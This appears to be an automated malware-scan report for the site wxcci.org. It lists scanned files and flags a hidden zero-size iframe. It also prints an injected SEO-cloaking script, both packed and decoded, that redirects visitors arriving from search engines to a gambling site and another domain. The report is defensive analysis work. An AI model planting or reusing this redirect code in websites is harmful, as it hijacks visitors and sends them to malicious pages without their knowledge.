Scanned pages/files
Request | Server response | Status |
http://wxcci.org/ | 200 OK Content-Length: 21358 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://www.wxcci.org/do/hack.php?hack=login&styletype=blue&iframeid=toplogin <iframe src="http://www.wxcci.org/do/hack.php?hack=login&styletype=blue&iframeid=toplogin" width=0 height=0> | ||
http://count31.51yes.com/click.aspx?id=310940343&logo=1 | 200 OK Content-Length: 1777 Content-Type: text/html | clean |
http://count31.51yes.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://api.discuz.com.de/Seo.js | 200 OK Content-Length: 702 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[02-79a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3(4.7.9(\'a\')==-1){0 2=new Date();2.setTime(2.getTime()+8);4.7=\'a=1;expires=\'+2.toGMTString();0 b=4.referrer;0 5=[\'baidu\',\'google\',\'yahoo\',\'bing\',\'soso\',\'sogou\',\'360.cn\',\'so.c\',\'youdao\',\'anquan\'];for(0 i in 5){3(b.9(5[i])!=-1){3(d.6.e){d.6.e.f=\'g://www.bocai.ch/\'};6.f.href=\'g://cnrdn.c/AtDE\'}}}',[],17,'var||exp|if|document|bot|window|cookie||indexOf|whoami|ref|com|parent|opener|location|http'.split('|'),0,{})) Decoded script: if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}} | ||
http://www.wxcci.org/images/default/inc.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.wxcci.org/images/default/default.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.wxcci.org/images/default/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/default/jquery-1.2.6.min.js | 200 OK Content-Length: 91327 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/blue/sliding.js | 200 OK Content-Length: 316 Content-Type: application/x-javascript | clean |
http://www.wxcci.org/images/default/rollpic.js | 200 OK Content-Length: 6435 Content-Type: application/x-javascript | clean |
http://pw.cnzz.com/c.php?id=82460757 | 200 OK Content-Length: 9323 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wxcci.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 01:07:20 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=gb2312
Set-Cookie: USR=ehojdrsz%090%091405991240%09http%3A%2F%2Fwxcci.org%2Findex.php; expires=Wed, 23-Jul-2014 01:07:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.10
Second query (visit from search engine):
GET / HTTP/1.1
Host: wxcci.org
Referer: http://www.google.com/search?q=wxcci.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wxcci.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wxcci.org/
Result: wxcci.org is not infected or malware details are not published yet.